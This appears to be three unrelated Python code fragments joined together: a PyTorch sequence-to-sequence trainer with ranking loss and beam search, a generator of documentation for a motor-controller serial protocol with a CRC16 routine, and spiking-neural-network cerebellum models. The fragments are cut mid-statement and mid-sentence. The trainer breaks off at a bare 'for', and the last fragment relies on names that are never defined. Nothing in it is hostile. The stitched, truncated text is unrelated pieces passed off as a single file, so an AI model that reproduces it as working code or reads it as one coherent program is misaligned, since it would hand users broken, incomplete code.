print(timestamp(), 'Epoch [%d/%d] | Step [%d/%d] | Loss: %.4f | Perplexity: %5.4f'
%(epoch, args.num_epochs, i, len(train_dl) - 1, avg_loss_per_example, np.exp(avg_loss_per_word)))
total_loss = 0.0
total_tokens = 0.0
return EvaluationResult(total_loss_unmutated, total_tokens_unmutated)
def train_mrl(args, encoder, decoder, criterion_xent, criterion_mrl, encoder_optimizer, decoder_optimizer, train_dl, epoch, mrl_factor=1.0, alternate_updates=False, use_xent_criterion=False):
if encoder:
encoder.train()
decoder.train()
total_loss = 0.0
total_loss_unmutated = 0.0 # similar to above but not mutated to zero when logging
for i, (encoder_inputs, decoder_inputs, decoder_outputs, _) in enumerate(train_dl):
if args.development_mode and i == 100:
break
criteria = ['xent', 'mrl']
if alternate_updates:
criteria = [criteria[i%2]]
for ckey in criteria:
if encoder_optimizer:
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
use_teacher_forcing = True if random.random() < args.teacher_forcing_ratio else False
if use_teacher_forcing:
if ckey == 'xent':
encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
loss = decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion_xent)
target_outputs = decoder_outputs.target_outputs
normalized_loss = loss / float(len(target_outputs[0]))
normalized_loss.backward()
elif ckey == 'mrl':
encoder_context_1 = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context_1 = initialize_with_context(encoder, decoder, encoder_context_1, args)
loss1 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context_1, criterion_xent, use_neg_sample=False, use_xent_criterion=use_xent_criterion)
normalized_loss1 = loss1 / float(len(decoder_outputs.target_outputs[0]))
encoder_context_2 = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context_2 = initialize_with_context(encoder, decoder, encoder_context_2, args)
loss2 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context_2, criterion_xent, use_neg_sample=True, use_xent_criterion=use_xent_criterion)
normalized_loss2 = loss2 / float(len(decoder_outputs.target_outputs_neg[0]))
target = torch.FloatTensor((1)).fill_(-1)
target = to_var(target)
loss = criterion_mrl(normalized_loss1.unsqueeze(0), normalized_loss2.unsqueeze(0), target)
loss.backward()
else: # FIXME: Fix this # NOTE: BROKEN! DO NOT USE!
print("Error: non-teacher forcing is not supported at this time.")
sys.exit(0)
if encoder:
rnn_encoder_modules = list(
filter(lambda x: isinstance(x, nn.GRU) or isinstance(x, nn.LSTM), list(encoder.modules()))
)
if rnn_encoder_modules: # clip only when there is an encoder AND RNNs exists in encoder
torch.nn.utils.clip_grad_norm_(encoder.parameters(), args.clip) # TODO: clip gradients for the RNN params only?
torch.nn.utils.clip_grad_norm_(decoder.parameters(), args.clip)
if encoder_optimizer:
encoder_optimizer.step()
decoder_optimizer.step()
total_loss += loss.item()
total_loss_unmutated += loss.item()
# print logging info
if (args.log_step and i > 0 and i % args.log_step == 0) or (i == len(train_dl) - 1):
if i == args.log_step:
batch_size = args.log_step + 1
elif i == len(train_dl) - 1:
batch_size = len(train_dl) % args.log_step - 1
else:
batch_size = args.log_step
avg_loss_per_example = total_loss / float(batch_size)
print(timestamp(), 'Epoch [%d/%d] | Step [%d/%d] | Loss: %.4f'
%(epoch, args.num_epochs, i, len(train_dl) - 1, avg_loss_per_example))
total_loss = 0.0
return EvaluationResult(total_loss_unmutated)
def eval(args, encoder, decoder, criterion, dev_dl):
if encoder:
encoder.eval()
decoder.eval()
# compute the validation loss
validation_loss = 0.0
num_tokens = 0.0
with torch.no_grad():
for i, (encoder_inputs, decoder_inputs, decoder_outputs, _) in enumerate(dev_dl):
if args.development_mode and i == 1:
break
encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
loss = decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion)
validation_loss += loss.item()
target_outputs = decoder_outputs.target_outputs
num_tokens += len(target_outputs[0])
return EvaluationResult(validation_loss, num_tokens)
def eval_mrl(args, encoder, decoder, criterion_xent, criterion_mrl, dev_dl, mrl_factor=1.0, use_xent_criterion=False):
if encoder:
encoder.eval()
decoder.eval()
# compute the validation loss of this epoch's model
validation_loss = 0.0
num_tokens = 0.0
with torch.no_grad():
for i, (encoder_inputs, decoder_inputs, decoder_outputs, _) in enumerate(dev_dl):
if args.development_mode and i == 1:
break
criteria = ['xent', 'mrl']
for ckey in criteria:
if ckey == 'xent':
encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
loss = decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion_xent)
validation_loss += loss.item()
target_outputs = decoder_outputs.target_outputs
num_tokens += len(target_outputs[0])
elif ckey == 'mrl':
encoder_context_1 = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context_1 = initialize_with_context(encoder, decoder, encoder_context_1, args)
loss1 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context_1, criterion_xent, use_neg_sample=False, use_xent_criterion=use_xent_criterion)
normalized_loss1 = loss1 / float(len(decoder_outputs.target_outputs[0]))
encoder_context_2 = encoder(encoder_inputs) if encoder else EncoderContext()
encoder_context_2 = initialize_with_context(encoder, decoder, encoder_context_2, args)
loss2 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context_2, criterion_xent, use_neg_sample=True, use_xent_criterion=use_xent_criterion)
normalized_loss2 = loss2 / float(len(decoder_outputs.target_outputs_neg[0]))
target = torch.FloatTensor((1)).fill_(-1)
target = to_var(target)
loss = criterion_mrl(normalized_loss1.unsqueeze(0), normalized_loss2.unsqueeze(0), target)
validation_loss += loss.item()
target_outputs = decoder_outputs.target_outputs
num_tokens += len(target_outputs[0])
# encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
# encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
# loss1 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion_xent, use_neg_sample=False)
# normalized_loss1 = loss1 / float(len(decoder_outputs.target_outputs[0]))
# encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
# encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
# loss2 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion_xent, use_neg_sample=True)
# normalized_loss2 = loss2 / float(len(decoder_outputs.target_outputs_neg[0]))
# target = torch.FloatTensor((1)).fill_(-1)
# if torch.cuda.is_available():
# target = target.cuda()
# target = to_var(target)
# loss_triplet = mrl_factor*criterion_mrl(normalized_loss1.unsqueeze(0), normalized_loss2.unsqueeze(0), target) + (1-mrl_factor)*((normalized_loss1+normalized_loss2)/2)
# validation_loss += loss_triplet.item()
return EvaluationResult(validation_loss, num_tokens)
def decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion, visualize=False, params=None):
target_inputs = to_var(decoder_inputs.target_inputs)
target_outputs = to_var(decoder_outputs.target_outputs)
decoder_hidden = encoder_context.decoder_hidden
loss = 0.0
for t in range(len(target_inputs[0])):
# one time step
decoder_input = target_inputs[0][t].view(1, -1) # Next input is current target
decoder_output, decoder_hidden, _ = decoder(decoder_input, decoder_hidden, encoder_context)
if visualize:
from torchviz import make_dot
g = make_dot(decoder_output, params)
g.view()
break
loss += criterion(decoder_output, target_outputs[0][t].view(1))
return loss
def decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion_xent, use_neg_sample=False, use_xent_criterion=False):
target_inputs = to_var(decoder_inputs.target_inputs) if not use_neg_sample else to_var(decoder_inputs.target_inputs_neg)
target_outputs = to_var(decoder_outputs.target_outputs) if not use_neg_sample else to_var(decoder_outputs.target_outputs_neg)
decoder_hidden = encoder_context.decoder_hidden
loss = 0.0
for t in range(len(target_inputs[0])):
decoder_input = target_inputs[0][t].view(1, -1) # Next input is current target
decoder_output, decoder_hidden, _ = decoder(decoder_input, decoder_hidden, encoder_context)
if use_xent_criterion:
loss += criterion_xent(decoder_output, target_outputs[0][t].view(1))
else:
m = nn.LogSoftmax()
decoder_output = m(decoder_output)
target_output = target_outputs[0][t].item()
loss += decoder_output.view(-1)[target_output]
return loss
def initialize_with_context(encoder, decoder, encoder_context, args):
"""
Condition decoder on encoder's output appropriately
"""
def f(encoder_hidden):
"""
use same final encoder hidden state to initialize every decoder layer
take encoder hidden state from something like [1, 1, 100] -> [2, 1, 100]
"""
encoder_hidden_flattened = encoder_hidden.view(-1)
hidden_size = encoder_hidden_flattened.size()[0]
zero_vector = torch.zeros(hidden_size)
if torch.cuda.is_available():
zero_vector = zero_vector.cuda()
decoder_hidden_flattened = torch.cat(
[encoder_hidden_flattened] + [zero_vector] * (decoder.num_hidden_layers - 1)
)
decoder_hidden = decoder_hidden_flattened.view(decoder.num_hidden_layers, 1, -1)
return decoder_hidden
if not args.concatenate_decoder_hidden:
encoder_context.decoder_hidden_concat = torch.Tensor([])
if torch.cuda.is_available():
encoder_context.decoder_hidden_concat = encoder_context.decoder_hidden_concat.cuda()
else:
if not isinstance(encoder_context.decoder_hidden_concat, torch.Tensor) and not encoder_context.decoder_hidden_concat:
encoder_context.decoder_hidden_concat = f(torch.randn(1, 1, args.decoder_hidden_concat_size))
if torch.cuda.is_available():
encoder_context.decoder_hidden_concat = encoder_context.decoder_hidden_concat.cuda()
elif isinstance(encoder_context.decoder_hidden_concat, tuple):
encoder_context.decoder_hidden_concat = encoder_context.decoder_hidden_concat[0]
# set decoder hidden state
if not args.set_decoder_hidden:
encoder_context.decoder_hidden = None
else:
if not isinstance(encoder_context.decoder_hidden, torch.Tensor) and not encoder_context.decoder_hidden:
print("ERROR: you specified to initialize decoder hidden state with encoder context, but no context was given.")
sys.exit(0)
hidden_concat = encoder_context.decoder_hidden_concat
encoder_context.decoder_hidden = torch.cat((encoder_context.decoder_hidden, hidden_concat), 2)
if isinstance(encoder_context.decoder_hidden, tuple): # true in case of lstm
# TODO: BROKEN -- FIX ME
encoder_context.decoder_hidden = (f(encoder_context.decoder_hidden[0]), f(encoder_context.decoder_hidden[1]))
else: # true in case of gru and non-rnn modules
encoder_context.decoder_hidden = f(encoder_context.decoder_hidden)
# concatenate context to decoder inputs
if not args.concatenate_decoder_inputs:
encoder_context.decoder_input_concat = torch.Tensor([])
if torch.cuda.is_available():
encoder_context.decoder_input_concat = encoder_context.decoder_input_concat.cuda()
else:
if not isinstance(encoder_context.decoder_input_concat, torch.Tensor) and not encoder_context.decoder_input_concat:
encoder_context.decoder_input_concat = torch.randn(1, 1, args.decoder_input_concat_size)
if torch.cuda.is_available():
encoder_context.decoder_input_concat = encoder_context.decoder_input_concat.cuda()
elif isinstance(encoder_context.decoder_input_concat, tuple):
encoder_context.decoder_input_concat = encoder_context.decoder_input_concat[0]
# advance decoder by one timestep
if args.advance_decoder_t0:
decoder_input = encoder_context.decoder_input_t0
_, encoder_context.decoder_hidden, _ = decoder(decoder_input, encoder_context.decoder_hidden, encoder_context, bypass_embed=True)
return encoder_context
# BEAM SEARCH DECODING
# FIXME: Avoid use magic strings everywhere for SOS and EOS tokens
class Sentence:
def __init__(self, decoder_hidden, last_idx, last_idx_sibling_rank, sentence_idxes=[], sentence_scores=[]):
if(len(sentence_idxes) != len(sentence_scores)):
raise ValueError("length of indexes and scores should be the same")
self.decoder_hidden = decoder_hidden
self.last_idx = last_idx
self.last_idx_sibling_rank = last_idx_sibling_rank # needed for diverse decoding
self.sentence_idxes = sentence_idxes
self.sentence_scores = sentence_scores
def likelihoodScore(self):
if len(self.sentence_scores) == 0:
return -99999999.999 # TODO: check
# return mean of sentence_score
# TODO: Relates to the normalized loss function used when training?
# NOTE: No need to length normalize when making selection for beam. Only needed during final selection.
return sum(self.sentence_scores) / len(self.sentence_scores)
def penalizedLikelihoodScore(self, gamma):
"""
Diverse decoding: https://arxiv.org/pdf/1611.08562.pdf
"""
return sum(self.sentence_scores) - gamma * self.last_idx_sibling_rank
def addTopk(self, topi, topv, decoder_hidden, beam_size, voc, EOS_token):
terminates, sentences = [], []
for i in range(beam_size):
if topi[0][i] == EOS_token:
terminates.append(([voc.idx2word[idx.item()] for idx in self.sentence_idxes] + ['</architect>'], # TODO: need the eos token?
self.likelihoodScore())) # tuple(word_list, score_float)
continue
idxes = self.sentence_idxes[:] # pass by value
scores = self.sentence_scores[:] # pass by value
idxes.append(topi[0][i])
scores.append(topv[0][i])
sentences.append(Sentence(decoder_hidden, topi[0][i], i+1, idxes, scores))
return terminates, sentences # NOTE: terminates can be of size 0 or 1 only
def toWordScore(self, voc, EOS_token):
words = []
for i in range(len(self.sentence_idxes)):
if self.sentence_idxes[i] == EOS_token: # NOTE: never hit
words.append('</architect>')
else:
words.append(voc.idx2word[self.sentence_idxes[i].item()])
if self.sentence_idxes[-1] != EOS_token:
words.append('</architect>')
return (words, self.likelihoodScore())
def beam_decode(decoder, encoder_context, voc, beam_size, max_length, gamma=None, num_top_sentences=1):
decoder_hidden = encoder_context.decoder_hidden
terminal_sentences, prev_top_sentences, next_top_sentences = [], [], []
prev_top_sentences.append(Sentence(decoder_hidden=decoder_hidden, last_idx=voc('<architect>'), last_idx_sibling_rank=1))
for _ in range(max_length):
for | |
<gh_stars>1-10
from textwrap import dedent
def get_static_part(protocol):
s = dedent("""
Communication protocol specification
====================================
Communication protocol v{0}
.. contents::
:local:
Protocol description
--------------------
Controller can be controlled from the PC using serial connection
(COM-port). COM-port parameters are fixed controller-side:
- Speed: 115200 baud
- Frame size: 8 bits
- Stop-bits: 2 bits
- Parity: none
- Flow control: none
- Byte receive timeout: 400 ms
- Bit order: little endian
- Byte order: little endian
Command execution
-----------------
All data transfers are initiated by the PC, meaning that the
controller waits for incoming commands and replies accordingly. Each
command is followed by the controller response, with rare exceptions
of some service commands. One should not send another command without
waiting for the previous command answer.
Commands are split into service, general control and general
information types.
Commands are executed immediately. Parameters which are set by Sxxx
commands are applied no later than 1ms after acknowledgement.
Command processing does not affect real-time engine control (PWM,
encoder readout, etc).
Both controller and PC have an IO buffer. Received commands and
command data are processed once and then removed from buffer.
Each command consists of 4-byte identifier and optionally a data
section followed by its 2-byte CRC. Data can be transmitted in both
directions, from PC to the controller and vice versa. Command is
scheduled for execution if it is a legitimate command and (in case of
data) if its CRC matches. After processing a correct command
controller replies with 4 bytes - the name of processed command,
followed by data and its 2-byte CRC, if the command is supposed to
return data.
Controller-side error processing
--------------------------------
Wrong command or data
~~~~~~~~~~~~~~~~~~~~~
If the controller receives a command that cannot be interpreted as a
legitimate command, then controller ignores this command, replies with
an "errc" string and sets "command error" flag in the current status
data structure. If the unreconized command contained additional data,
then it can be interpreted as new command(s). In this case
resynchronization is required.
If the controller receives a valid command with data and its CRC
doesn't match the CRC computed by the controller, then controller
ignores this command, replies with an "errd" string and sets "data
error" flag in the current status data structure. In this case
synchronization is not needed.
CRC calculation
~~~~~~~~~~~~~~~
CRC is calculated for data only, 4-byte command identifier is not
included. CRC algorithm in C is as follows:
.. code-block:: c
unsigned short CRC16(INT8U *pbuf, unsigned short n)
{{
unsigned short crc, i, j, carry_flag, a;
crc = 0xffff;
for(i = 0; i < n; i++)
{{
crc = crc ^ pbuf[i];
for(j = 0; j < 8; j++)
{{
a = crc;
carry_flag = a & 0x0001;
crc = crc >> 1;
if ( carry_flag == 1 ) crc = crc ^ 0xa001;
}}
}}
return crc;
}}
This function receives a pointer to the data array, pbuf, and data
length in bytes, n. It returns a two byte CRC code.
**The example of CRC calculation:**
**Command code (CMD):** \"home\" or 0x656D6F68
.. code-block:: c
0x68 0x6F 0x6D 0x65
CMD
**Command code (CMD):** \"gpos\" or 0x736F7067
.. code-block:: c
0x67 0x70 0x6F 0x73
CMD
**Command code (CMD):** \"movr\" or 0x72766F6D
.. code-block:: c
0x6D 0x6F 0x76 0x72 0x00 0x00 0x00 0xC8 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x53 0xc7
CMD DeltaPosition uDPos Reserved CRC
.. figure:: crc.png
:align: center
Transmission errors
~~~~~~~~~~~~~~~~~~~
Most probable transmission errors are missing, extra or altered byte.
In usual settings transmission errors happen rarely, if at all.
Frequent errors are possible when using low-quality or broken
USB-cable or board interconnection cable. Protocol is not designed for
use in noisy environments and in rare cases an error may match a valid
command code and get executed.
Missing byte, controller side
"""""""""""""""""""""""""""""""
A missing byte on the controller side leads to a timeout on the PC
side. Command is considered to be sent unsuccessfully by the PC.
Synchronization is momentarily disrupted and restored after a timeout.
Missing byte, PC side
""""""""""""""""""""""""
A missing byte on the PC side leads to a timeout on PC side.
Synchronization is maintained.
Extra byte, controller side
""""""""""""""""""""""""""""""
An extra byte received by the controller leads to one or several
"errc" or "errd" responses. Command is considered to be sent
unsuccessfully by the PC. Receive buffer may also contain one or
several "errc" or "errd" responses. Synchronization is disrupted.
Extra byte, PC side
""""""""""""""""""""""""
An extra byte received by the PC leads to an incorrectly interpreted
command or CRC and an extra byte in the receive buffer.
Synchronization is disrupted.
Altered byte, controller side
""""""""""""""""""""""""""""""
An altered byte received by the controller leads to one or several
"errc" or "errd" responses. Command is considered to be sent
unsuccessfully by the PC. Receive buffer may also contain one or
several "errc" or "errd" responses. Synchronization can rarely be
disrupted, but is generally maintained.
Altered byte, PC side
""""""""""""""""""""""""
An altered byte received by the PC leads to an incorrectly interpreted
command or CRC. Synchronization is maintained.
Timeout resynchronization
~~~~~~~~~~~~~~~~~~~~~~~~~
If during packet reception next byte wait time exceeds timeout value,
then partially received command is ignored and receive buffer is
cleared. Controller timeout should be less than PC timeout, taking into
account time it takes to transmit the data.
Zero byte resynchronization
~~~~~~~~~~~~~~~~~~~~~~~~~~~
There are no command codes that start with a zero byte ('\\\\0'). This
allows for a following synchronization procedure: controller always
answers with a zero byte if the first command byte is zero, PC ignores
first response byte if it is a zero byte. Then, if synchronization is
disrupted on either side the following algorithm is used:
In case PC receives "errc", "errd" or a wrong command answer code,
then PC sends 4 to 250 zeroes to the controller (250 byte limit is
caused by input buffer length and usage of I2C protocol, less than 4
zeroes do not guarantee successful resynchronization). During this
time PC continuously reads incoming bytes from the controller until
the first zero is received and stops sending and receiving right after
that.
Received zero byte is likely not a part of a response to a previous
command because on error PC receives "errc"/"errd" response. It is
possible in rare cases, then synchronization procedure will start
again. Therefore first zero byte received by the PC means that
controller input buffer is already empty and will remain so until any
command is sent. Right after receiving first zero byte from the
controller PC is ready to transmit next command code. The rest of zero
bytes in transit will be ignored because they will be received before
controller response.
This completes the zero byte synchronization procedure.
Library-side error processing
-----------------------------
Nearly every library function has a return status of type `result_t`.
After sending command to the controller library reads incoming bytes
until a non-zero byte is received. All zero bytes are ignored. Library
reads first 4 bytes and compares them to the command code. It then
waits for data section and CRC, if needed. If first 4 received bytes
do not match the sent command identifier, then zero byte
synchronization procedure is launched, command is considered to be
sent unsuccessfully. If first 4 received bytes match the sent command
identifier and command has data section, but the received CRC doesn't
match CRC calculated from the received data, then zero byte
synchronization procedure is launched, command is considered to be
sent unsuccessfully. If a timeout is reached while the library is
waiting for the controller response, then zero byte synchronization
procedure is launched, command is considered to be sent
unsuccessfully.
If no errors were detected, then command is considered to be
| |
* mask
# if bias is not None and ctx.needs_input_grad[2]:
if ctx.needs_input_grad[2]:
grad_bias = grad_output.sum(0).squeeze(0)
return grad_input, grad_weight, grad_bias, grad_mask
class SparseLinear(nn.Module):
def __init__(self, input_features, output_features, bias=True, mask=None):
"""
Argumens
------------------
mask [numpy.array]:
the shape is (n_input_feature, n_output_feature).
the elements are 0 or 1 which declare un-connected or
connected.
bias [bool]:
flg of bias.
"""
super(SparseLinear, self).__init__()
self.input_features = input_features
self.output_features = output_features
# nn.Parameter is a special kind of Tensor, that will get
# automatically registered as Module's parameter once it's assigned
# as an attribute.
self.weight = nn.Parameter(torch.Tensor(
self.output_features, self.input_features))
if bias:
self.bias = nn.Parameter(
torch.Tensor(self.output_features))
else:
# You should always register all possible parameters, but the
# optional ones can be None if you want.
self.register_parameter('bias', None)
# Initialize the above parameters (weight & bias).
self.init_params()
if mask is not None:
mask = torch.tensor(mask, dtype=torch.float).t()
self.mask = nn.Parameter(mask, requires_grad=False)
# print('\n[!] CustomizedLinear: \n', self.weight.data.t())
else:
self.register_parameter('mask', None)
def init_params(self):
stdv = 1. / math.sqrt(self.weight.size(1))
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
def forward(self, input):
# See the autograd section for explanation of what happens here.
return SparseLinearFunction.apply(
input, self.weight, self.bias, self.mask)
def extra_repr(self):
# (Optional)Set the extra information about this module. You can test
# it by printing an object of this class.
return 'input_features={}, output_features={}, bias={}, mask={}'.format(
self.input_features, self.output_features,
self.bias is not None, self.mask is not None)
class cere_SNN(nn.Module):
def __init__(self,batch_size,num_in_MF,num_out_MF,num_out_GC,num_out_PC,num_out_DCN,possion_num=50):
super(cere_SNN, self).__init__()
self.batch_size = batch_size
self.num_in_MF = num_in_MF*16
self.num_out_MF = num_out_MF*4
self.num_out_GC = num_out_GC*4
self.num_out_PC = num_out_PC*4
self.num_out_DCN = num_out_DCN*8
self.possion_num = possion_num
MF_GC_mask = gen_mask(self.num_out_MF, self.num_out_GC,num_ones=4)
self.fc1 = nn.Linear(self.num_in_MF, self.num_out_MF, bias = if_bias)
self.fc2 = SparseLinear(self.num_out_MF, self.num_out_GC, bias = if_bias,mask=MF_GC_mask)
self.fc3 = nn.Linear(self.num_out_GC, self.num_out_PC, bias = if_bias)
self.fc4 = nn.Linear(self.num_out_PC, self.num_out_DCN, bias = if_bias)
print("number of parameters: %e", sum(p.numel() for p in self.parameters()))
def forward(self,m,u,sigma,f, time_window):
self.fc1 = self.fc1.float()
# self.fc3.weight.data = torch.clamp(self.fc3.weight, -100, 0)
h1_mem = h1_spike = h1_sumspike = torch.zeros(self.batch_size, self.num_out_MF).cuda()
h2_mem = h2_spike = h2_sumspike = torch.zeros(self.batch_size, self.num_out_GC).cuda()
h3_mem = h3_spike = h3_sumspike = torch.zeros(self.batch_size, self.num_out_PC).cuda()
h4_mem = h4_spike = h4_sumspike = torch.zeros(self.batch_size, self.num_out_DCN).cuda()
input = torch.cat((m,u,sigma,f),1)
x = input
sum_out = None
for t in range(time_window):
x_t = x[:,:,t]
x_t = x_t.view(self.batch_size, -1)
h1_mem, h1_spike = mem_update(self.fc1, x_t, h1_mem, h1_spike)
#h1_sumspike += h1_spike
h2_mem, h2_spike = mem_update(self.fc2, h1_spike, h2_mem, h2_spike)
#h1_sumspike += h1_spike
h3_mem, h3_spike = mem_update(self.fc3, h2_spike, h3_mem, h3_spike)
#h1_sumspike += h1_spike
#DCN:
baseline_MF = torch.mean(h1_spike)
m_DCN_in = -h3_spike + torch.abs(baseline_MF)
h4_mem, h4_spike = mem_update(self.fc4, m_DCN_in, h4_mem, h4_spike)
#h1_sumspike += h1_spike
sum_out = h4_spike if sum_out is None else sum_out + h4_spike
return sum_out
class cere_model(nn.Module):
def __init__(self,batch_size,num_in_MF,
num_out_MF,num_out_GC,num_out_PC,num_out_DCN,possion_num=50,gpu='0'):
super(cere_model,self).__init__()
self.batch_size = batch_size
self.num_out_MF = num_out_MF
self.num_out_GC = num_out_GC
self.num_out_PC = num_out_PC
self.num_out_DCN = num_out_DCN
self.possion_num = possion_num
self.device = torch.device("cuda:"+gpu if torch.cuda.is_available() else "cpu")
#MF: every class coded by 4 neurons
self.m_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
self.u_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
self.sigma_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
self.f_MF = nn.Linear(num_in_MF*4, num_out_MF, bias = if_bias)
#GC:
num_in_GC=num_out_MF
self.m_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
self.u_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
self.sigma_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
self.f_GC = nn.Linear(num_in_GC, num_out_GC, bias = if_bias)
#PC:
num_in_PC=4*num_out_GC
#PC E
self.m_PCE = nn.Linear(num_in_PC, num_out_PC, bias = if_bias)
#PC I
self.m_PCI = nn.Linear(num_in_PC, num_out_PC, bias = if_bias)
#DCN: every class coded by 4 neurons
num_in_DCN=num_out_PC
self.m_DCN = nn.Linear(num_in_DCN, num_out_DCN*8, bias = if_bias)
print("number of parameters: %e", sum(p.numel() for p in self.parameters()))
# #STDP prams
# #monitor
# self.monitor_MF_m = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
# self.monitor_MF_u = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
# self.monitor_MF_sigma = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
# self.monitor_MF_f = torch.zeros(self.batch_size, self.num_out_MF, self.possion_num).to(self.device)
# self.monitor_GC_m = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
# self.monitor_GC_u = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
# self.monitor_GC_sigma = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
# self.monitor_GC_f = torch.zeros(self.batch_size, self.num_out_GC, self.possion_num).to(self.device)
# self.monitor_PCE_m = torch.zeros(self.batch_size, self.num_out_PC, self.possion_num).to(self.device)
# self.monitor_PCI_m = torch.zeros(self.batch_size, self.num_out_PC, self.possion_num).to(self.device)
# self.monitor_DCN_m = torch.zeros(self.batch_size, self.num_out_DCN*8, self.possion_num).to(self.device)
def forward(self,m,u,sigma,f, time_window):
batch_size = m.shape[0]
self.monitor_DCN_m = torch.zeros(batch_size, self.num_out_DCN*8, self.possion_num).cuda()
m_MF_mem = m_MF_spike = u_MF_mem = u_MF_spike = sigma_MF_mem = sigma_MF_spike = f_MF_mem = f_MF_spike = torch.zeros(batch_size, self.num_out_MF).cuda()
m_GC_mem = m_GC_spike = u_GC_mem = u_GC_spike = sigma_GC_mem = sigma_GC_spike = f_GC_mem = f_GC_spike = torch.zeros(batch_size, self.num_out_GC).cuda()
m_PCE_mem = m_PCE_spike = u_PCE_mem = u_PCE_spike = m_PCI_mem = m_PCI_spike = u_PCI_mem = u_PCI_spike = torch.zeros(batch_size, self.num_out_PC).cuda()
m_DCN_mem = m_DCN_spike = torch.zeros(batch_size, self.num_out_DCN*8).cuda()
m = m.float()
u = u.float()
sigma = sigma.float()
f = f.float()
for step in range(time_window):
sum_out_m = sum_out_u = None
#x = x.float()
#x = x.view(self.batch_size, -1)
#x_t = torch.from_numpy(x[:,t]).float().to(self.device)
for t in range(time_window):
m_t = m[:,:,t]
m_t = m_t.view(batch_size, -1)
u_t = u[:,:,t]
u_t = u_t.view(batch_size, -1)
sigma_t = sigma[:,:,t]
sigma_t = sigma_t.view(batch_size, -1)
f_t = f[:,:,t]
f_t = f_t.view(batch_size, -1)
#MF:
m_MF_mem, m_MF_spike = mem_update(self.m_MF, m_t, m_MF_mem, m_MF_spike)
u_MF_mem, u_MF_spike = mem_update(self.u_MF, u_t, u_MF_mem, u_MF_spike)
sigma_MF_mem, sigma_MF_spike = mem_update(self.sigma_MF, sigma_t, sigma_MF_mem, sigma_MF_spike)
f_MF_mem, f_MF_spike = mem_update(self.f_MF, f_t, f_MF_mem, f_MF_spike)
#GC:
m_GC_mem, m_GC_spike = mem_update(self.m_GC, m_MF_spike, m_GC_mem, m_GC_spike)
u_GC_mem, u_GC_spike = mem_update(self.u_GC, u_MF_spike, u_GC_mem, u_GC_spike)
sigma_GC_mem, sigma_GC_spike = mem_update(self.sigma_GC, sigma_MF_spike, sigma_GC_mem, sigma_GC_spike)
f_GC_mem, f_GC_spike = mem_update(self.f_GC, f_MF_spike, f_GC_mem, f_GC_spike)
#PC:
#combine tensor
PF_in = torch.cat((m_GC_spike,u_GC_spike,sigma_GC_spike,f_GC_spike),0)
PF_in = PF_in.view(batch_size, -1)
MF_in = torch.cat((m_MF_spike,u_MF_spike,sigma_MF_spike,f_MF_spike),0)
MF_in = MF_in.view(batch_size, -1)
m_PCE_mem, m_PCE_spike = mem_update(self.m_PCE, PF_in, m_PCE_mem, m_PCE_spike)
m_PCI_mem, m_PCI_spike = mem_update(self.m_PCI, PF_in, m_PCI_mem, m_PCI_spike)
#DCN:
baseline_MF = torch.mean(MF_in)
m_DCN_in = m_PCE_spike + m_PCI_spike + baseline_MF
m_DCN_mem, m_DCN_spike = mem_update(self.m_DCN, m_DCN_in, m_DCN_mem, m_DCN_spike)
# with torch.no_grad():
# self.monitor_MF_m[:,:,t] = m_MF_spike.detach()
# self.monitor_MF_u[:,:,t] = u_MF_spike.detach()
# self.monitor_MF_sigma[:,:,t] = sigma_MF_spike.detach()
# self.monitor_MF_f[:,:,t] = f_MF_spike.detach()
# self.monitor_GC_m[:,:,t] = m_GC_spike.detach()
# self.monitor_GC_u[:,:,t] = u_GC_spike.detach()
# self.monitor_GC_sigma[:,:,t] = sigma_GC_spike.detach()
# self.monitor_GC_f[:,:,t] = f_GC_spike.detach()
# self.monitor_PCE_m[:,:,t] = m_PCE_spike.detach()
# self.monitor_PCI_m[:,:,t] = m_PCI_spike.detach()
self.monitor_DCN_m[:,:,t] = m_DCN_spike
sum_out_m = m_DCN_spike if sum_out_m is None else sum_out_m + m_DCN_spike
return sum_out_m#, self.monitor_DCN_m
# def stdp_step(self, reward, lr):
# r_stdp(self.monitor_PCE_m[0],self.monitor_DCN_m[0],self.m_DCN.weight[:,0:self.num_out_PC], reward,lr=lr)
# r_stdp(self.monitor_PCI_m[0],self.monitor_DCN_m[0],self.m_DCN.weight[:,self.num_out_PC:2 * self.num_out_PC], reward,lr=lr)
